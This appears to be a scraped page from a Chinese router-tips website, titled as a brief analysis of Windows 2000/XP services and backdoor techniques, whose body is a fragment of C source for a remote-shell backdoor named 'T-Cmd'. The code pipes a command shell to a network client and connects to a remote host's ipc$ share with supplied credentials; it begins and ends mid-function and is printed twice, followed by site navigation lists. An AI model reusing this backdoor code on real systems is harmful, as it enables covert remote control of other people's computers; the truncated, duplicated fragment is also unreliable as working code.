浅析Windows 2000/XP服务与后门技术

(lpProcessDataEnd==NULL))
{
lpProcessDataHead=lpProcessDataNow;
lpProcessDataEnd=lpProcessDataNow;
}
else
{
lpProcessDataEnd->next=lpProcessDataNow;
lpProcessDataEnd=lpProcessDataNow;
}

hThread[0]=lpProcessInfo.hProcess;
dwProcessId=lpProcessInfo.dwProcessId;
CloseHandle(lpProcessInfo.hThread);
ReleaseMutex(hMutex);

CloseHandle(hWriteShell);
CloseHandle(hReadShell);

sdRead.hPipe = hReadPipe;
sdRead.sClient = sClient;
hThread[1] = CreateThread(NULL,0,ReadShell,(LPVOID*)&sdRead,0,&dwSendThreadId);
if(hThread[1]==NULL)
{
OutputDebugString("CreateThread of ReadShell(Send) Error !\n");
return -1;
}

sdWrite.hPipe = hWritePipe;
sdWrite.sClient = sClient;
hThread[2] = CreateThread(NULL,0,WriteShell,(LPVOID *)&sdWrite,0,&dwReavThreadId);
if(hThread[2]==NULL)
{
OutputDebugString("CreateThread for WriteShell(Recv) Error !\n");
return -1;
}

dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE);
if((dwResult>=WAIT_OBJECT_0) && (dwResult<=(WAIT_OBJECT_0 + 2)))
{
dwResult-=WAIT_OBJECT_0;
if(dwResult!=0)
{
TerminateProcess(hThread[0],1);
}
CloseHandle(hThread[(dwResult+1)%3]);
CloseHandle(hThread[(dwResult+2)%3]);
}

CloseHandle(hWritePipe);
CloseHandle(hReadPipe);

WaitForSingleObject(hMutex,INFINITE);
lpProcessDataLast=NULL;
lpProcessDataNow=lpProcessDataHead;
while((lpProcessDataNow->next!=NULL) && (lpProcessDataNow->dwProcessId!=dwProcessId))
{
lpProcessDataLast=lpProcessDataNow;
lpProcessDataNow=lpProcessDataNow->next;
}
if(lpProcessDataNow==lpProcessDataEnd)
{
if(lpProcessDataNow->dwProcessId!=dwProcessId)
{
OutputDebugString("No Found the Process Handle !\n");
}
else
{
if(lpProcessDataNow==lpProcessDataHead)
{
lpProcessDataHead=NULL;
lpProcessDataEnd=NULL;
}
else
{
lpProcessDataEnd=lpProcessDataLast;
}
}
}
else
{
if(lpProcessDataNow==lpProcessDataHead)
{
lpProcessDataHead=lpProcessDataNow->next;
}
else
{
lpProcessDataLast->next=lpProcessDataNow->next;
}
}
ReleaseMutex(hMutex);

return 0;
}

DWORD WINAPI ReadShell(LPVOID lpParam)
{
SESSIONDATA sdRead=*(PSESSIONDATA)lpParam;
DWORD dwBufferRead,dwBufferNow,dwBuffer2Send;
char szBuffer[BUFFER_SIZE];
char szBuffer2Send[BUFFER_SIZE+32];
char PrevChar;
char szStartMessage[256]="\r\n\r\n\t\t---[ T-Cmd v1.0 beta, by TOo2y ]---\r\n\t\t---[ E-mail: TOo2y@safechina.net ]---\r\n\t\t---[ HomePage: www.safechina.net ]---\r\n\t\t---[ Date: 02-05-2003 ]---\r\n\n";
char szHelpMessage[256]="\r\nEscape Character is 'CTRL+]'\r\n\n";

send(sdRead.sClient,szStartMessage,256,0);
send(sdRead.sClient,szHelpMessage,256,0);

while(PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL))
{
if(dwBufferRead>0)
{
ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
}
else
{
Sleep(10);
continue;
}

for(dwBufferNow=0,dwBuffer2Send=0;dwBufferNow<dwBufferRead;dwBufferNow++,
dwBuffer2Send++)
{
if((szBuffer[dwBufferNow]=='\n') && (PrevChar!='\r'))
{
szBuffer[dwBuffer2Send++]='\r';
}
PrevChar=szBuffer[dwBufferNow];
szBuffer2Send[dwBuffer2Send]=szBuffer[dwBufferNow];
}

if(send(sdRead.sClient,szBuffer2Send,dwBuffer2Send,0)==SOCKET_ERROR)
{
OutputDebugString("Send in ReadShell Error !\n");
break;
}
Sleep(5);
}

shutdown(sdRead.sClient,0x02);
closesocket(sdRead.sClient);
return 0;
}

DWORD WINAPI WriteShell(LPVOID lpParam)
{
SESSIONDATA sdWrite=*(PSESSIONDATA)lpParam;
DWORD dwBuffer2Write,dwBufferWritten;
char szBuffer[1];
char szBuffer2Write[BUFFER_SIZE];

dwBuffer2Write=0;
while(recv(sdWrite.sClient,szBuffer,1,0)!=0)
{
szBuffer2Write[dwBuffer2Write++]=szBuffer[0];

if(strnicmp(szBuffer2Write,"exit\r\n",6)==0)
{
shutdown(sdWrite.sClient,0x02);
closesocket(sdWrite.sClient);
return 0;
}

if(szBuffer[0]=='\n')
{
if(WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL)==0)
{
OutputDebugString("WriteFile in WriteShell(Recv) Error !\n");
break;
}
dwBuffer2Write=0;
}
Sleep(10);
}

shutdown(sdWrite.sClient,0x02);
closesocket(sdWrite.sClient);
return 0;
}

BOOL ConnectRemote(BOOL bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode;
NETRESOURCE NetResource;

sprintf(lpIPC,"\\\\%s\\ipc$",lpHost);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;

if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}

if(bConnect)
{
printf("Now Connecting ...... ");
while(1)
{
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if((dwErrorCode==ERROR_ALREADY_ASSIGNED)

关键词：浅析Windows 2000/XP服务与后门技术

争怎路由网：是一个主要分享无线路由器安装设置经验的网站，汇总WiFi常见问题的解决方法。争怎路由网网线连接电脑联网分出来 Internet wifi显示网站首页不能上网路由器密码 WiFi设置路由器设置 TP-Link 腾达路由器软件教程游戏教程系统下载您当前所在位置：下载首页 -> 杀毒教程
浅析Windows 2000/XP服务与后门技术时间：2024/4/25作者：未知来源：争怎路由网人气： (lpProcessDataEnd==NULL)) { lpProcessDataHead=lpProcessDataNow; lpProcessDataEnd=lpProcessDataNow; } else { lpProcessDataEnd->next=lpProcessDataNow; lpProcessDataEnd=lpProcessDataNow; } hThread[0]=lpProcessInfo.hProcess; dwProcessId=lpProcessInfo.dwProcessId; CloseHandle(lpProcessInfo.hThread); ReleaseMutex(hMutex); CloseHandle(hWriteShell); CloseHandle(hReadShell); sdRead.hPipe = hReadPipe; sdRead.sClient = sClient; hThread[1] = CreateThread(NULL,0,ReadShell,(LPVOID)&sdRead,0,&dwSendThreadId); if(hThread[1]==NULL) { OutputDebugString("CreateThread of ReadShell(Send) Error !\n"); return -1; } sdWrite.hPipe = hWritePipe; sdWrite.sClient = sClient; hThread[2] = CreateThread(NULL,0,WriteShell,(LPVOID )&sdWrite,0,&dwReavThreadId); if(hThread[2]==NULL) { OutputDebugString("CreateThread for WriteShell(Recv) Error !\n"); return -1; } dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE); if((dwResult>=WAIT_OBJECT_0) && (dwResult<=(WAIT_OBJECT_0 + 2))) { dwResult-=WAIT_OBJECT_0; if(dwResult!=0) { TerminateProcess(hThread[0],1); } CloseHandle(hThread[(dwResult+1)%3]); CloseHandle(hThread[(dwResult+2)%3]); } CloseHandle(hWritePipe); CloseHandle(hReadPipe); WaitForSingleObject(hMutex,INFINITE); lpProcessDataLast=NULL; lpProcessDataNow=lpProcessDataHead; while((lpProcessDataNow->next!=NULL) && (lpProcessDataNow->dwProcessId!=dwProcessId)) { lpProcessDataLast=lpProcessDataNow; lpProcessDataNow=lpProcessDataNow->next; } if(lpProcessDataNow==lpProcessDataEnd) { if(lpProcessDataNow->dwProcessId!=dwProcessId) { OutputDebugString("No Found the Process Handle !\n"); } else { if(lpProcessDataNow==lpProcessDataHead) { lpProcessDataHead=NULL; lpProcessDataEnd=NULL; } else { lpProcessDataEnd=lpProcessDataLast; } } } else { if(lpProcessDataNow==lpProcessDataHead) { lpProcessDataHead=lpProcessDataNow->next; } else { lpProcessDataLast->next=lpProcessDataNow->next; } } ReleaseMutex(hMutex); return 0; } DWORD WINAPI ReadShell(LPVOID lpParam) { SESSIONDATA sdRead=(PSESSIONDATA)lpParam; DWORD dwBufferRead,dwBufferNow,dwBuffer2Send; char szBuffer[BUFFER_SIZE]; char szBuffer2Send[BUFFER_SIZE+32]; char PrevChar; char szStartMessage[256]="\r\n\r\n\t\t---[ T-Cmd v1.0 beta, by TOo2y ]---\r\n\t\t---[ E-mail: TOo2y@safechina.net ]---\r\n\t\t---[ HomePage: www.safechina.net ]---\r\n\t\t---[ Date: 02-05-2003 ]---\r\n\n"; char szHelpMessage[256]="\r\nEscape Character is 'CTRL+]'\r\n\n"; send(sdRead.sClient,szStartMessage,256,0); send(sdRead.sClient,szHelpMessage,256,0); while(PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL)) { if(dwBufferRead>0) { ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL); } else { Sleep(10); continue; } for(dwBufferNow=0,dwBuffer2Send=0;dwBufferNow<dwBufferRead;dwBufferNow++, dwBuffer2Send++) { if((szBuffer[dwBufferNow]=='\n') && (PrevChar!='\r')) { szBuffer[dwBuffer2Send++]='\r'; } PrevChar=szBuffer[dwBufferNow]; szBuffer2Send[dwBuffer2Send]=szBuffer[dwBufferNow]; } if(send(sdRead.sClient,szBuffer2Send,dwBuffer2Send,0)==SOCKET_ERROR) { OutputDebugString("Send in ReadShell Error !\n"); break; } Sleep(5); } shutdown(sdRead.sClient,0x02); closesocket(sdRead.sClient); return 0; } DWORD WINAPI WriteShell(LPVOID lpParam) { SESSIONDATA sdWrite=(PSESSIONDATA)lpParam; DWORD dwBuffer2Write,dwBufferWritten; char szBuffer[1]; char szBuffer2Write[BUFFER_SIZE]; dwBuffer2Write=0; while(recv(sdWrite.sClient,szBuffer,1,0)!=0) { szBuffer2Write[dwBuffer2Write++]=szBuffer[0]; if(strnicmp(szBuffer2Write,"exit\r\n",6)==0) { shutdown(sdWrite.sClient,0x02); closesocket(sdWrite.sClient); return 0; } if(szBuffer[0]=='\n') { if(WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL)==0) { OutputDebugString("WriteFile in WriteShell(Recv) Error !\n"); break; } dwBuffer2Write=0; } Sleep(10); } shutdown(sdWrite.sClient,0x02); closesocket(sdWrite.sClient); return 0; } BOOL ConnectRemote(BOOL bConnect,char lpHost,char lpUserName,char lpPassword) { char lpIPC[256]; DWORD dwErrorCode; NETRESOURCE NetResource; sprintf(lpIPC,"\\\\%s\\ipc$",lpHost); NetResource.lpLocalName = NULL; NetResource.lpRemoteName = lpIPC; NetResource.dwType = RESOURCETYPE_ANY; NetResource.lpProvider = NULL; if(!stricmp(lpPassword,"NULL")) { lpPassword=NULL; } if(bConnect) { printf("Now Connecting ...... "); while(1) { dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE); if((dwErrorCode==ERROR_ALREADY_ASSIGNED) 关键词：浅析Windows 2000/XP服务与后门技术*	*软件教程* 聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用多媒体区网站教程其它教程技术开发安卓教程 *人气排行* 1局域网内命令大全 22017好用的公共DNS推荐 3Windows 0day EternalBlue(永恒之蓝... 4腾讯王卡1元1天宽带活动正式开发办理！ 5菲律宾某省政府网站被黑疑为国内黑客所为 6小心应对也许会出现的10.10.10电脑病毒 7无线网络连接上但上不了网处理方法 8是怕不给礼金？伴娘太敬业胸挂二维码 9华平终端端口关闭方法设置说明 10WannaCry蠕虫勒索病毒用户处置方法 *推荐资讯* 1腾达 N315 无线路由器动态IP连接上网设置路由器 2word2007图片显示不全处理方法 3TP-Link TL-WR847N V1~V3 无线路由器... 4在Linux系统中如何用防火墙伪装抵挡黑客攻击 5win7系统时间无法更改如何处理？ 6在页面中如何用css让图片有立体感的效果?（代码实测） 7对于微信小程序的选择器（时间，日期，地区）的解析 8水星 MW450R V4 无线路由器WDS桥接设置路由器 9FTP命令格式完全详细解说 10cmcc如何用？
Copyright © 2012-2018 争怎路由网(http://www.zhengzen.com) .All Rights Reserved 网站地图友情链接免责声明：本站资源均来自互联网收集如有侵犯到您利益的地方请及时联系管理删除，敬请见谅! QQ:1006262270 邮箱:kfyvi376850063@126.com 手机版